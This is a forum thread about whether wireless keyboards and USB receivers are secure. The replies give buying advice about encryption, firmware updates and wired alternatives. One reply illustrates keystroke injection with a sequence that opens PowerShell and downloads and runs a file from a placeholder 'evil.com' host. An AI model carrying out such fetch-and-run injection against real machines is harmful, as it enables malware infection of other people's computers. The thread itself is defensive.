I aways wondered if the communication channel between my wireless keyboard and the usb receiver-antena is secure. I never bother to reseach this. Today I figured out the practical way. I turned on my pc at work and I tried to type the first letter of my password. Nothing hapened. Then I started spamming that letter. Still nothing, until the person next to me said “my keyboard is typing all by itself”. It turns out she has a wireless mouse with a seemigly identical receiver-antena usb.

The moral of the story. If it was so easy to almost leak my password unintentionally due to this flaw of wireless keyboard communication, imagine wad a bad actor can do intentionally. Why try to brute force, social engineer e.t.c. when your password can be stollen in transit from your keyboard to your pc.

  • Skull giver@popplesburger.hilciferous.nl
    link
    fedilink
    arrow-up
    33
    ·
    edit-2
    1 year ago

    This strongly depends on the brands you use. Unencrypted, automatically re-pairing devices are not normal, it just sounds like you and your coworker bought devices from questionable brands. Logitech keyboards and dongles encrypt key presses, for example. You do need to regularly check for firmware updates for both your keyboard and the receiver (sometimes vulnerabilities are found and despite the spyware Logitech wants to install onto your computer, these updates aren’t done automatically) but they’re generally quite safe.

    Something perhaps more worrying: unencrypted keyboards will also let anyone in range inject keystrokes. A simple win+r, powershell.exe, wget http://evil.com, ./evil.exe could infect your computer if you look away for just five seconds.

    These pages show how various brands deal with such security bugs: KeyJack Affected Devices, MouseJack Affected Devices. TL;DR, don’t use anything from Microsoft or AliExpress/Amazon Basics and update your firmware.

    • black_mouflon@beehaw.orgOP
      link
      fedilink
      arrow-up
      5
      ·
      edit-2
      1 year ago

      Thanks. For what kind of specs I should be looking when byuing a wireless product? What key words I should be looking for?

      • “Encryption” most importantly, preferably encryption checked out by third parties. It’s no guarantee, but firmware updates for peripherals such as keyboards and receivers are usually a good sign; most hardware can use a firmware update down the line, but only the shitty brands don’t make any updates after release. The lists I linked also show how companies responded to flaws in their wireless communications: no response is a bad sign, if there is a response that’s usually a good sign (but may come with instructions like “customer should buy a new, up to date receiver”).

        Wired keyboards are also fine, of course, if you don’t want to deal with security risks.

        If you do want to go wireless, I would personally look at Logitech’s offerings, in my experience their hardware is usually quite good and they do eventually patch their bugs (unlike, say Microsoft).

        • black_mouflon@beehaw.orgOP
          link
          fedilink
          arrow-up
          3
          ·
          1 year ago

          I’ll probably going to update to wired. It has all of the advanteges except portability. The only reason I got that wireless keyboard was that I needed something small, chaeap and portable.

    • Pantherina@feddit.de
      link
      fedilink
      arrow-up
      1
      ·
      1 year ago

      Hmm, do you want a keyboard with firmware updates that encrypts keybresses…

      Or simply use USB?..

      • USB works great but you need a lot of extension cables to control your media center PC from the couch, and they’re usually not exactly up to spec either.

        I don’t use a wireless keyboard, I do have a wireless mouse for travelling, though. Sometimes wireless makes sense, sometimes it doesn’t.